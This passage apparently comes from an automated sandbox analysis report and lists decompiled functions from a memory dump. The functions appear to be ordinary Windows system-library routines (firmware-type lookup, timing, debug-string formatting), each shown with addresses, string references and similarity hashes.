Instruction Fuzzy Hash: 839170312043429FE725EE29C855B1BBBE9BFC4715F18892DF699CB280E774E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 019451BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E019451BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x19a05f0);
				E0191D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E018DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E019453CA(0);
						return E0191D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0190F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E018E3690(1, _t117, 0x18a1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0190AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L018E4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0190AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0194500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01909860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x019451be
0x019451c3
0x019451c8
0x019451cd
0x019451d0
0x019451d3
0x019451d8
0x019451db
0x019451de
0x019451e0
0x019451e3
0x019451e6
0x019451e8
0x01945342
0x01945351
0x01945356
0x0194535a
0x01945360
0x01945363
0x01945366
0x01945369
0x01945369
0x0194536b
0x0194536b
0x01945370
0x019453a3
0x019453a4
0x019453a6
0x019453ab
0x019453ab
0x019453ae
0x019453ae
0x019453b5
0x019453bf
0x019453bf
0x01945375
0x01945396
0x019453a0
0x019453a0
0x00000000
0x01945396
0x01945377
0x01945379
0x0194537f
0x0194538c
0x01945390
0x00000000
0x01945390
0x019451ee
0x019451f1
0x01945301
0x01945310
0x01945315
0x01945318
0x0194531b
0x01945320
0x0194532e
0x01945331
0x00000000
0x01945331
0x01945328
0x01945329
0x00000000
0x01945329
0x019451fa
0x01945235
0x01945236
0x01945239
0x0194523f
0x01945240
0x01945241
0x01945242
0x01945246
0x01945247
0x0194524e
0x01945251
0x01945267
0x01945269
0x0194526e
0x0194527d
0x0194527e
0x01945281
0x01945282
0x01945287
0x01945288
0x0194528a
0x0194528f
0x01945294
0x00000000
0x00000000
0x0194529a
0x0194529c
0x0194529e
0x0194529e
0x019452a4
0x019452b0
0x00000000
0x00000000
0x019452ba
0x019452bc
0x019452bc
0x019452d4
0x019452d9
0x019452dc
0x019452e1
0x00000000
0x00000000
0x019452e7
0x019452f4
0x00000000
0x019452f4
0x01945270
0x00000000
0x01945270
0x019451fc
0x019451fd
0x01945202
0x01945203
0x01945205
0x0194520a
0x0194520f
0x00000000
0x00000000
0x0194521b
0x01945226
0x0194522b
0x0194521d
0x0194521d
0x01945222
0x01945222
0x0194522d
0x00000000

Strings

Legacy, xrefs: 01945226
UEFI, xrefs: 0194521D

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: b61a574ba6bf4e8d2f4614e3235357e1317f049177985d4d528e48249b9ed711
Instruction ID: b10fb3742a5501fda3036a8c235564f87aec120a533d8e2e06ca53c6d6d9e6f8
Opcode Fuzzy Hash: b61a574ba6bf4e8d2f4614e3235357e1317f049177985d4d528e48249b9ed711
Instruction Fuzzy Hash: E1516B71A00609DFEB25DFA8C880EAEBBF8FF48700F15446EE649EB291D6719940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 018EB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E018EB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x19bd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E018E7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01998CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01909E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0190B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0190CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E018E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01998F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0190AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x19b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x19b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x19b8628; // 0x0
							_t116 =  *0x19b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x018eb94c
0x018eb956
0x018eb95c
0x018eb95e
0x018eb964
0x018eb969
0x018eb96d
0x018eb96d
0x018eb970
0x018eb974
0x018eb97a
0x018ebadf
0x018ebadf
0x018ebae2
0x018ebae4
0x018ebae6
0x018ebaf0
0x01932cb8
0x018ebaf6
0x018ebaf6
0x018ebaf6
0x018ebafd
0x018ebb1f
0x018ebb1f
0x018ebaff
0x018ebb00
0x018ebb00
0x018ebb03
0x018ebb03
0x018ebacb
0x018ebacf
0x018ebad0
0x018ebad1
0x018ebadc
0x018ebadc
0x018eb980
0x018eb980
0x018eb988
0x018eb98b
0x018eb98d
0x018eb990
0x018eb993
0x018eb999
0x018eb99b
0x018eb9a1
0x018eb9a5
0x018eb9aa
0x018eb9b0
0x018eb9bb
0x018eb9c0
0x018eb9c3
0x018eb9ca
0x018eb9cc
0x018eb9cf
0x018eb9d3
0x018eb9d7
0x018eba94
0x018eba94
0x018eba98
0x018ebaa3
0x01932ccb
0x018ebaa9
0x018ebaa9
0x018ebaa9
0x018ebab1
0x01932cd5
0x01932cdd
0x01932cdd
0x018ebabb
0x018ebabc
0x018ebac2
0x018ebac3
0x018ebac3
0x018ebac6
0x00000000
0x018eb9dd
0x018eb9dd
0x018eb9e7
0x018eb9e7
0x018eb9ec
0x018eb9ec
0x018eb9f1
0x018eb9f5
0x018eb9fa
0x018eba00
0x018eba0c
0x018eba10
0x018eba10
0x018eba12
0x018eba18
0x00000000
0x00000000
0x018ebb26
0x018ebb26
0x018eba1e
0x018eba1e
0x018eba23
0x018eba25
0x018eba2c
0x018eba30
0x018eba35
0x018eba35
0x018eba41
0x018eba46
0x018eba4c
0x018eba50
0x018eba54
0x018eba6a
0x018eba6e
0x018eba70
0x018eba74
0x018eba78
0x018eba7a
0x018eba7c
0x018eba8e
0x018eba90
0x018eba92
0x018ebb14
0x018ebb14
0x018ebb16
0x018ebb16
0x00000000
0x018eba7c
0x018ebb0a
0x018ebb0d
0x00000000
0x00000000
0x00000000
0x018ebb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018EB9A5

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: d82e993218254395ee1c528461720df2138d7b8171adf6e083411edf4b67239f
Instruction ID: 7aad141fe774792bdfa12f20a667ae09cf263aab81e1721389fdb942a5cbb71d
Opcode Fuzzy Hash: d82e993218254395ee1c528461720df2138d7b8171adf6e083411edf4b67239f
Instruction Fuzzy Hash: BB515771A09345CFCB21DF68C08492ABBE9FB89714F14496EE689D7355E730E940CB92

Uniqueness

Uniqueness Score: -1.00%

Function 018CB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E018CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x199f7a8);
				E0191D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0191D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0190D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0190F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0191DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0190B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0190B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0190E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0190A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x018cb171
0x018cb171
0x018cb171
0x018cb171
0x018cb171
0x018cb176
0x018cb17b
0x018cb180
0x018cb186
0x018cb18f
0x018cb198
0x018cb1a4
0x018cb1aa
0x01924802
0x01924802
0x01924805
0x0192480c
0x0192480e
0x018cb1d1
0x018cb1d3
0x018cb1de
0x018cb1de
0x01924817
0x0192481e
0x01924820
0x01924822
0x01924822
0x01924824
0x01924824
0x0192482a
0x00000000
0x00000000
0x01924835
0x0192483a
0x0192483d
0x0192483f
0x01924842
0x01924842
0x01924842
0x01924846
0x0192484c
0x0192484e
0x01924851
0x01924851
0x01924853
0x01924854
0x01924854
0x01924858
0x0192485a
0x0192485a
0x0192485d
0x0192485f
0x01924861
0x01924861
0x01924866
0x0192486b
0x0192486e
0x01924871
0x01924876
0x01924876
0x01924878
0x0192487b
0x01924884
0x01924884
0x00000000
0x0192487d
0x0192487d
0x01924882
0x01924889
0x01924889
0x0192488f
0x01924891
0x019248e0
0x019248e2
0x019248e4
0x019248e4
0x019248e7
0x019248e7
0x019248ed
0x019248f4
0x019248f6
0x01924951
0x01924951
0x01924953
0x01924953
0x01924956
0x01924956
0x01924958
0x01924959
0x01924959
0x0192495d
0x0192495d
0x0192495f
0x0192495f
0x01924965
0x01924969
0x019249ba
0x019249ba
0x019249c1
0x019249c5
0x019249cc
0x019249d4
0x019249d7
0x019249da
0x019249e4
0x019249e5
0x019249f3
0x01924a02
0x00000000
0x01924a02
0x01924972
0x01924974
0x00000000
0x00000000
0x01924976
0x01924979
0x01924982
0x01924983
0x01924984
0x0192498b
0x0192498d
0x01924991
0x01924993
0x01924999
0x0192499d
0x019249a2
0x019249a2
0x019249a2
0x01924999
0x019249ac
0x00000000
0x019249b3
0x019248f8
0x019248fe
0x00000000
0x00000000
0x00000000
0x019248fe
0x01924895
0x0192489c
0x019248ad
0x019248b2
0x019248b5
0x019248b7
0x019248ba
0x019248bc
0x019248c6
0x019248c6
0x019248cb
0x019248d1
0x019248d4
0x019248d8
0x019248d8
0x00000000
0x019248d8
0x019248be
0x019248c0
0x00000000
0x00000000
0x019248c2
0x00000000
0x00000000
0x00000000
0x019248c4
0x00000000
0x01924882
0x0192487b
0x01924904
0x01924906
0x00000000
0x00000000
0x01924908
0x0192490e
0x00000000
0x00000000
0x01924910
0x01924917
0x01924917
0x00000000
0x01924917
0x018cb1ba
0x019247f9
0x019247fc
0x00000000
0x00000000
0x00000000
0x019247fc
0x018cb1c0
0x018cb1c0
0x018cb1c3
0x018cb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 019248AD

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: e0aa358de9e7c8c4928a8ae0ec618d513e5c090f98b996dabf566cabe28174bd
Instruction ID: 48d75750da390119d838175407a13d0caa8c071fba160b38ceda81092c1a479b
Opcode Fuzzy Hash: e0aa358de9e7c8c4928a8ae0ec618d513e5c090f98b996dabf566cabe28174bd
Instruction Fuzzy Hash: 9E51D375E102698FDB36CF68C845BBEBBB4BF44B10F1041ADD85DAB286D7704941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 018F2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 018F2642, 018F2691

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: d6f19abd11a47e00d349df3edd73b3efb1bf2c7a82b7d764b2854ac87b046348
Instruction ID: 3dd4eac5cb182a3648d47a7f4f2fb98a21116f4bd23ae81eb56ec516a88cf219
Opcode Fuzzy Hash: d6f19abd11a47e00d349df3edd73b3efb1bf2c7a82b7d764b2854ac87b046348
Instruction Fuzzy Hash: 0DC19F71E00219DFDB25DF99D980AAEBBB6FF48754F14402DEA05EB290D734EA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 018FFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0193BE0F

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 4781463e68b8ee1875483ac1a9fdb0f21b958ea9f1fdc75cc99b2bdc9174a89b
Instruction ID: 6f864c2f8b8fa511210bb85733a963eb301327f4ad69c75ecf87d5b9c96253c6
Opcode Fuzzy Hash: 4781463e68b8ee1875483ac1a9fdb0f21b958ea9f1fdc75cc99b2bdc9174a89b
Instruction Fuzzy Hash: B9A12572B0072A8BEB35DF6CC45077AB7A8AF84715F04456DEB1ACB680DB34DA01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018C2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0191FA4A

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: a194cd58c6587820e3058ed25e87884ccbd11149f5ec156b645c41f9f6b3c34e
Instruction ID: 5ef3fd78c3aed503a671e7697d7d533c223cd7bb6baed053cda946f0e42f298e
Opcode Fuzzy Hash: a194cd58c6587820e3058ed25e87884ccbd11149f5ec156b645c41f9f6b3c34e
Instruction Fuzzy Hash: A9613831A0064D9FEB32DB6CC880B7E7BEAEB40B14F140659D919E72C2D734DA84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01990EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 01990F16

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 37c0b944ba8cf856c5d8d7c6da48a52b676671158aeb0e96ef8c775ab876fb66
Instruction ID: d8dc710cef9ca9d64d72c4d12a5767e4f45426b3c659a3c87862463a301172b2
Opcode Fuzzy Hash: 37c0b944ba8cf856c5d8d7c6da48a52b676671158aeb0e96ef8c775ab876fb66
Instruction Fuzzy Hash: 37517C713043429BEB25DF2CD984B1BBBE9BBC4714F08092DFA9A97290D671E905C762

Uniqueness

Uniqueness Score: -1.00%

Function 018FF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 018FF124

Memory Dump Source

Source File: 00000005.00000002.390342174.00000000018A0000.00000040.00000001.sdmp, Offset: 018A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 305e6002c484a7cfe09fe4b9cb480e64971b2ab603b6051867acdc27820d81bf
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 8F515A72504B159FC321DF19C840A6BBBE8FF88714F00892DFA99D7690E7B4E954CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01943540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0194358F

Memory Dump Source

